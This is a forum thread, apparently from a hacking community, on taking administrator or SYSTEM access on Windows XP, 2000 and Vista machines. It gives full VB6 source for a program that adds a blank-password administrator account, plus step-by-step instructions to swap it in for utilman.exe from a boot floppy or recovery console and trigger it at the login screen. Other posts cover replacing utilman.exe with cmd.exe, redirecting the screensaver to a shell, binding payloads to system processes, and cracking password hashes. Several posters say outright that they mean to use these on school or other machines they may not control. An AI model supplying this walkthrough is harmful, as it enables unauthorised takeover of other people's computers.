Gain SYSTEM/Administrative Access to Windows XP/2000

[beelzebub]

This is awesome

Oh, wow Famicoman, I like your input on the topic at hand.  :-P

*waits for the ban on IRC*  8-)

[Famicoman]

Apparently two years ago, I thought this was awesome.

[m1d63t]

For a while i have had the idea to modify the xml of my launch pad. What i intend to do is modify the code so that it has a button that will run the script to add a new admin. I have made a u3p install file previosly of the script compiled as utilman. it is hit or miss as to whether or not the prog will add an account that is a full admin. Logged on as admin it ads a user that is a member of both user and admin. Logged on as a restricted user sometimes it works adding a new restricted user.

Today i am going to start trying to inject the script into the xml of my launch pad.... preferabel i would like to have a new version of the "u3accessgrant" compiled with the script tacked onto it.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
  <assemblyIdentity version="1.0.0.0"
     processorArchitecture="X86"
     name="U3LauncherInstallBase.exe"
     type="win32"/> 

  <description>Installs the U3Launcher</description> 
  <!-- Identify the application security requirements. -->
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel
          level="requireAdministrator"
          uiAccess="false"/>
        </requestedPrivileges>
       </security>
  </trustInfo>
</assembly>

[celltoolz]

LOL, Its been so long since i started this thread... I just cant believe its still going. And by the way, im still stoned HAHAHA.........

We still need to find a way to gain access while logged in as Guest or a Lower Privileged User. The only way i could think of doing so is by exploiting a System Process that already has Administrator or System Level Privileges. Or I've heard that the Windows API is a very exploitable place but thats all I'm gonna say cause we just cant give out all our secrets now can we?. B)

[Zimmer]

Couldn't You Replace the Sam File To Change the Hash this causes a different password or has Windows totally lock that out of possibilities. BTW utilman.exe runs even if the computer is locked.

******EDIT*******

I heard of someone using Linux Live CD and coping cmd.exe and renaming it utilman.exe then Crtl + U then just type in explorer.exe and there was a video of it and it worked.

[X3N]

I just noticed this topic... there are some interesting ideas.... however there are a few problems. Everyone that should know, knows how easy it is to add an administrator account with rebooting. Using a Linux distro or some other UBCD method. What I'd like to know is if you are a normal user on a system can you add a new administrator account without rebooting and on a system that has a password on the administrator account.

Reading through this topic I've found some common problems with people's "methods".

1. The at command hack is only going to work on some systems that don't have it locked out.

2. Rebooting is just not an option.

3. Other ways involve adding a user to a system that doesn't have an admin password.

4. cmd.exe is usually used... some systems may have this locked out as well.

So what I'd like to see is something that works on a locked down system. Without rebooting.

The key to this is going to be modifying some process or service that runs as system.

Replacing it with a hacked version of the .exe or even possibly infecting a .dll file that gets loaded by a system .exe. This also needs to be done without rebooting and without any admin access.

Having access to executable's on a thumb drive is permitted. If this could be bound to a .doc or .pps or some other office format would be cool too.

So this is my challenge to all yall's.

[X3N]

So my concept here is taking a payload that adds a new user with custom password, binding that to a critical system process. Then killing the process forcing windows to restart the process with the new hacked program bound to the original exe.

The concept should be easy enough the trick is finding what exe or dll can be used when not the administrator and how to kill it > infect it > restart it.

The killing should be easy enough with an external program like pskill or another process killer program.

The infection process basically consists of writing a vbs or bat or autoIT script to add a user with admin priv's. Then binding it to some .exe with upx or some other exe binder.

Windows should take care of the automatic restart of the process or some application that a user has access to can have the payload attached.

[NuMmErO15]

Hi guy's,

I'm pretty new here and i'm from the Netherlands, so exuse me if my english isn't that good.

I tried a few things to modify utilman.exe (isn't switched of at my school). First I tried to boot a live linux usb, this worked because usb-boot was enabled in the bios (standard configuration). But when i tried to edit te utilman.exe i got the message that i could not change te permissions. How is this possible?

I realise i'm a newby:P, but i hope you guys can help me...

[Joerg]

I think you didn't have write permissions.

[NuMmErO15]

Thanks for the reply,

I knew that I didn't have the permissions but can someone tell me a way so that I do have the permissions.

And does someone know how it's possible that I don't have the permissions. (because i taught the permissions only worked when logged on windows)........

[Joerg]

I guess you want to write on a ntfs file system, which is usually not writeable by default by a linux system.

[NuMmErO15]

Didn't know that lol :P

I will just give it a try with something like BartPE.....

You'll hear from me.

[Zimmer]

Well you have to have it from a admin permission sys exe. You can't edit sys files usually locked. Memory is usaully scanned by anti virus for malicous code but what about Virtual Memory, the hard drive all you would have to do is fill up the RAM to get admin permision exe into virtual memory then add the bit and bytes. Think it would work?

[C0DEM0NKEY]

There is a Linux NTFS project up on the web you guys might want to read into it. This seems like a crazy idea but it would be cool to see if it would work on any PC without sending out a few red flags that something had been altered.

here's a link to the linux ntfs wiki >>> Linux NTFS wiki

Quick note from the people @ ntfs-3g.org

Linux: Make sure you have the basic development tools and the kernel includes the FUSE kernel module.

Please note that NTFS-3G doesn't require the FUSE user space package and it doesn't need to be installed.

[cooper]

See here: http://www.ntfs-3g.org/

It requires FUSE but that's pretty much it.

[C-S-B]

I've used the Offline NT PW & Reg editor numerous times to gain admin access to machines for work when the user has forgotten the P/W.

As long as you have a clean shutdown of Windows, Linux doesnt have any major issues writing to NTFS.

I don't know if it still works but alternatively you can set the screensaver to point to the command.com in the registry. Wait for the screensaver to appear on the login screen and boom, a shell.

Hello btw - I'm new.

[yottabyte]

Use program: dellater.exe to delete the targeted file upon the next boot. The command "dellater.exe" must be in the folder of the targeted file. Use CMD to execute the action.

OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this

to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.

(Im stoned and its 3:15a.m. so i hope this makes sense)

Overview:

Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is

located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make

your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this

will take a few minutes depending on how fast the PC is.

First We need to make the program

I used Visual Basic 6, here is my source code that i used to create the administrative account:

#################################START###############################

Private Sub Form_Load()

Shell "net user NewAdmin " & """""" & " /add", vbHide

Pause (1)

Shell "net localgroup administrators NewAdmin /add", vbHide

Pause (1)

msgbox "Added Administrative User",16,"Hacked XP"

End

End Sub

Sub Pause(interval)

'Pauses execution

Current = Timer

Do While Timer - Current < Val(interval)

DoEvents

Loop

End Sub

'#################################END###############################

Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank

password and then adds them to the Administrators Group.

Ok Now that we've made the program lets move on...

FAT32

1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe

2. Add the newly made Utilman.exe to the Floppy

3. Restart the computer with the floppy in it

4. After DOS loads type C: and press enter.

5. If it changes from A:/> to C:/> then your doing good

6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file

7. Restart the computer without the floppy in it

8. When it gets to the Login Screen Press the Windows Key + U

9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10

9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your

PC.

10. After pressing <b>Windows Key + U</b> then type in the username NewAdmin and push Enter. Thats It you now have administrative access to

your PC.

NTFS

Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)

LOL i hope that made sense

[yottabyte]

Use ellater.exe to delete the targeted file upon the next system boot.

[Baalho]

the link to the compiled version of utilman.exe is down.

Since the original post was made long time ago, does the method still work on XP professional sp3?

edit:

@C-S-B

from Offline NT pw & reg-editor website

"DANGER WILL ROBINSON!

If used on users that have EFS encrypted files, and the system is XP or Vista, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again If you don't know if you have encrypted files or not, you most likely don't have them. (except maybe on corporate systems) "

Thats is exactly a situation I would like to avoid.

any other solutions?

thanks a bunch

at

[C-S-B]

Do you actually have enrypted files? Not many users do, never had a prob with this tool.

[Baalho]

Do you actually have enrypted files? Not many users do, never had a prob with this tool.

you have got a point there. But with that method you reset the admin password to gain system access.

there is no possibility to restore the system to its original state (original admin password). So you leave the system modified, in order to gain admin access and leave tracks behind.

Its a good method to reset admin password none the less.

---edit:

Ophcrack worked great for cracking the hash.

thanks for the help though.

[C-S-B]

you have got a point there. But with that method you reset the admin password to gain system access.

there is no possibility to restore the system to its original state (original admin password). So you leave the system modified, in order to gain admin access and leave tracks behind.

Its a good method to reset admin password none the less.

---edit:

Ophcrack worked great for cracking the hash.

thanks for the help though.

So you're not supposed to be accessing t system?

Naughty...

[celltoolz]

Im donig a little work on this, so far ive tested it and "MagniFy", (i guess thats what im gonna call it), works with SP3 Im about to do a test with vista. Ill let ya'll know how it goes and also post a link for a EXE of Utilman.exe (actually changed to Magnify.exe)

-Cell Toolz

[celltoolz]

Ok so i stayed up for a bit and found out that i can get it to work for vista. I like it a lot better now. Im gonna be updating this more often now days because i finally got a new computer and can start "hackin" again. Well anyways here the newest Administrative/System Access Program. Renamed from utilman.exe to MagniFy.exe

There's instructions in the ZIP file and also the VB source. Any questions or comments let me know.

Download Link:

http://dc117.2shared.com/download/4673450/...104749-183cb98d

[operat0r_001]

http://rmccurdy.com/scripts/procexp%20as%20system.exe

run M$'s procexp as SYSTEM ( works for VISTA ! )